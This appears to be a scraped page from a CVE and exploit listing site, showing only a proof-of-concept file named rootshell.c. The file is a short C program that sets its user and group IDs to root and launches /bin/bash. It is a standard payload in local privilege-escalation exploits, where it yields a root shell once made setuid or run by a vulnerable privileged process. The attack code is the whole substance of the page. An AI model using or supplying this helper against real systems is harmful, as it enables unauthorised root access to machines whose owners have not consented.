4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / rootshell.c C
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main(void) {
   setuid(0);
   setgid(0);
   execl("/bin/bash", "bash", NULL);
}